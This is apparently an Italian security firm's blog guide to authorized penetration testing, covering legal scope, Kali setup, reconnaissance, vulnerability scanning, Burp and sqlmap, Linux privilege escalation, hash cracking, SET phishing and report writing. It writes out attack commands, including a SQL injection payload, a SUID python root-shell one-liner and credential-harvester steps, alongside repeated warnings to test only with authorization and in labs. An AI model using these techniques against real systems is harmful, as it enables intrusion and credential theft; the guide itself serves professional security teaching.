Your client calls at 11:00 PM. The site is down. A firewall alert just fired: SQL injection attempt from an external IP. You discover a contact form left unsanitized three years ago. The last backup is two months old. – If you work in a mid-sized Italian company, you don’t need to imagine this scene. We at Meteora Web see it every day. That’s why we wrote this guide: not a theoretical manual, but an operational path on how to test a system’s security before someone else does it for you – without asking permission.
This Pillar Page covers the entire penetration testing lifecycle: methodology, tools, advanced techniques, and the most underestimated part – writing the report. Each section gives you something you can use immediately. No academic preamble.
What Ethical Hacking Is and the Legal Framework in Italy
Ethical hacking is the authorized test of a system’s defenses. Without written authorization, it’s a crime (Article 615-ter of the Italian Penal Code – unauthorized access to a computer system). In Italy, the reference framework is Law 48/2008, which ratifies the Budapest Convention on Cybercrime. An ethical penetration test must have a clear scope: targets, timelines, exclusions, handling of sensitive data. At Meteora Web, we always sign a document specifying what can and cannot be tested, and define time windows – never a surprise.
Standard methodologies: PTES, OWASP Testing Guide, OSSTMM
The three main internationally recognized methodologies are:
- PTES (Penetration Testing Execution Standard): 7 phases – pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, reporting.
- OWASP Testing Guide: focused on web applications, with checklists for each vulnerability (OWASP Top 10).
- OSSTMM (Open Source Security Testing Methodology Manual): more oriented toward operational security and processes.
We use a hybrid: OWASP for web application testing, PTES for infrastructure. Each phase produces data that flows into the final report.
Sponsored Protocol
Immediate action: Download the test authorization template from the OWASP Testing Guide website and adapt it to your reality. Never run a command without a signed document.
Kali Linux: Setting Up Your Penetration Testing Environment
Kali Linux is the Debian-based distribution most used for penetration testing. It includes over 600 pre-installed tools. Starting from scratch, the first step is installation: virtual (VirtualBox / VMware), bare-metal, or Live USB. For corporate network tests, we discourage Live USB due to limited write performance. A virtual machine with 4 GB RAM and 2 CPU cores is sufficient for most scenarios.
Essential post-installation commands
# Update the system
sudo apt update && sudo apt full-upgrade -y
# Install additional tools (if missing)
sudo apt install -y gobuster dirb seclists
# Verify core tool installation
which nmap sqlmap burpsuite hashcatWorkspace organization
Create a directory structure for each project:
mkdir -p ~/pentest/{recon,exploit,reports,loot}This simple schema prevents losing results and makes report writing easier. We use it for every assessment.
Immediate action: Install Kali Linux in a virtual environment, run the update, and create the directory structure above. Then install seclists (contains wordlists for directory busting and password cracking).
Reconnaissance and OSINT: Gathering Information Without Leaving Traces
The reconnaissance phase is what separates a pentester from a script kiddie. Passive collection (no packets sent to the target) and active scanning (controlled).
Passive OSINT: tools and techniques
- whois: domain information (registrant, nameservers, creation dates).
- theHarvester: extracts emails, subdomains, and public IPs from search engines, PGP keys, Linkedin.
- Shodan: search engine for connected devices (search
port:22 country:ITfor accessible SSH in Italy). - Google dorking: advanced operators like
site:target.com filetype:pdforintitle:"index of" /for directory listing.
# Example with theHarvester
theHarvester -d meteoraweb.com -l 500 -b googleActive enumeration: Nmap and masscan
Use Nmap for port scanning. Initial quick scan: nmap -sT -Pn -p1-10000 target. For internal networks or authorized tests, masscan is much faster:
Sponsored Protocol
sudo masscan 192.168.1.0/24 -p22,80,443,3306 --rate=1000Important: aggressive scans on production servers can trigger SOC alarms or block services. Always ask for test windows.
Immediate action: Perform passive OSINT on a domain you own (e.g., your blog). Use theHarvester and shodan.io. Document everything: the data collected will be used in the report.
Vulnerability Scanning: Nmap, Nessus, and OpenVAS
Automated vulnerability scanning is a necessary step but never sufficient. No tool replaces manual analysis. We use Nmap with NSE scripts for known vulnerabilities and OpenVAS for broader scans.
NSE (Nmap Scripting Engine) scanning
# Scan for vulnerabilities on a web service
nmap --script=http-vuln* -p80,443 targetRecommended scripts: http-sql-injection, http-xss, ssl-enum-ciphers. Watch out for false positives: every alert must be manually verified.
OpenVAS: quick install and configuration
# On Kali, OpenVAS is pre-installed (gvm)
sudo gvm-setup
sudo gvm-start
# Access via browser at https://127.0.0.1:9392 with credentials created during setupRun a “Full and Fast” scan, then export the report as PDF. False positives can be numerous: invest time in triage.
Immediate action: Set up OpenVAS on your Kali and launch a scan on a vulnerable virtual machine (e.g., Metasploitable 2). Compare results with an Nmap NSE scan. Learn to distinguish a false positive from a real vulnerability.
Web Application Pentesting: Burp Suite from Configuration to Exploit
Burp Suite Community Edition is the de facto standard for web application testing. The workflow: interception, traffic analysis, manual attack.
Proxy setup and HTTPS certificate
- Launch Burp Suite, go to Proxy > Options, port 8080.
- Configure the browser (e.g., Firefox) to use proxy 127.0.0.1:8080.
- Visit
http://burpsuiteand download the CA certificate for HTTPS interception.
Note: do not use your main browser with the proxy active. Use an isolated browser or a separate virtual machine to avoid contaminating your sessions.
Sponsored Protocol
Manual SQL Injection and sqlmap
Identified a vulnerable parameter? Example in a login form: username=admin' OR '1'='1. But the real power is combining Burp Repeater with sqlmap.
# Copy HTTP request from Burp Repeater and save to request.txt
sqlmap -r request.txt --batch --level=3 --risk=2Sqlmap automates database, table, and data extraction. But beware: never run sqlmap on an unauthorized target. It can corrupt data or crash the database.
Immediate action: Set up Burp Suite with Firefox on a virtual machine with OWASP WebGoat (a vulnerable app). Practice intercepting requests and modifying parameters. Then use sqlmap with the request file.
Privilege Escalation on Linux: From Initial Access to Root
Once you have initial access (e.g., a reverse shell on a web server), the goal is to escalate privileges. The main techniques:
- Kernel exploit: check with
uname -aand search for exploits for that version (e.g., Dirty Pipe CVE-2022-0847). - SUID misconfiguration: find binaries with suid bit using
find / -perm -4000 -type f 2>/dev/null. A classic:nmap --interactiveif it has suid. - Sudo rights: run
sudo -l. Sometimes an unprivileged user can execute commands as root without a password. - Cron jobs: look for scripts in /etc/crontab writable by your user.
Practical example: if you find /usr/bin/python3 with suid, you can run:
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'Immediate action: On a test Linux machine (e.g., Metasploitable 2 or a vulnerable Debian), gain a low-privilege shell (via SSH or reverse shell). Apply the checklist above and try to become root. Document every step: it will be the core of your report.
Password Cracking: Hashcat, John the Ripper, and Rainbow Tables
After a hash dump (e.g., from SQL injection or /etc/shadow file), offline cracking is required. Never attempt brute force online: slow and noisy.
Sponsored Protocol
Identify the hash type
hashid hash.txt
hash-identifierExample: $2y$10$... = bcrypt. $1$... = MD5 crypt.
Cracking with Hashcat
If you have a NVIDIA or AMD GPU, Hashcat is very fast. For Windows NTLM hashes:
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt -OAttack mode: Wordlist + Rules is the most effective. Use --rules-file best64.rule for standard mutations.
Rainbow tables: when they are useful
Rainbow tables are only useful for unsalted hashes (e.g., LM hash of Windows). For salted hashes (bcrypt, SHA256 with salt) they are useless. We recommend against using rainbow tables for web app tests: better invest in a good wordlist and custom rules.
Immediate action: Generate a SHA256 hash of a simple password (echo -n "password" | sha256sum). Put the hash in a file and try to crack it with Hashcat using rockyou.txt. Learn to recognize different hash types.
Social Engineering: Phishing Kits and Defenses
The weakest link is not the server – it’s the person. A well-crafted phishing attack can bypass any firewall. For internal tests, social engineering is often the most revealing.
Creating a phishing campaign with SET (Social Engineering Toolkit)
sudo setoolkit
1) Social-Engineering Attacks
2) Web Site Attack Vectors
3) Credential Harvester Attack Method
4) Site ClonerSET clones the target login page (e.g., Google Workspace) and sends the email. Success rate is high, but you must have explicit authorization and inform HR.
Defenses: MFA mandatory, email warning banners for external emails, regular training. We test client staff with simulated campaigns and then deliver awareness sessions.
Immediate action: If you have a test environment, install SET and try the credential harvester on a cloned site you own. Never use it against third parties without permission.
The Pentesting Report: How to Write a Professional Report
A penetration test without a report is worthless. The report is the document the client will use to justify security investments. It must be clear, concise, and prioritize actions.
Standard report structure
- Executive Summary: 1 page, non-technical language, describes overall risk (High/Medium/Low) and top 3 vulnerabilities.
- Methodology: tools used, dates, times, scope.
- Findings: each vulnerability with ID, severity (CVSSv3), description, proof of exploit (screenshot), impact, recommendation.
- Appendices: tool outputs, logs, copies of HTTP requests.
Example entry for a SQL injection
VULN-001: SQL Injection in 'id' parameter of /product.php page
Severity: Critical (CVSS 9.1)
Description: The id parameter is not sanitized. Sending "id=1 UNION SELECT 1,2,3,4" retrieves data from the users table.
Proof: [screenshot of sqlmap extracting password hashes]
Impact: Access to all database data, including users and credentials.
Recommendation: Use prepared statements (PDO or MySQLi).Immediate action: Prepare a report template in Markdown with the structure above. Every time you find a vulnerability, fill in the sheet immediately. Do not postpone documentation until the end of the test.
Sponsored Protocol
In Summary – What to Do Now
Ethical hacking is not a course to take; it’s a skill built by testing. Here are the concrete steps you can take today:
- Read the authorization document – without a signature, no test.
- Install Kali Linux in a VM and set up the environment as described.
- Perform passive OSINT on a domain you own.
- Run NSE and OpenVAS scans on a vulnerable machine (Metasploitable 2).
- Intercept an HTTP request with Burp Suite and try a manual SQL injection on WebGoat.
- Get a low-privilege shell (via exploit or SSH) and attempt privilege escalation.
- Write a report for every test you do, even if just for yourself.
We at Meteora Web do this every day. We come from accounting and code: every vulnerability found is a cost avoided. Security is not an expense; it’s an investment measured in operational continuity. To go deeper, check our article on Claude jailbreak to see how AI can be used in social engineering attacks. To defend hybrid infrastructures, read our guide on AI agents for protecting EV chargers.
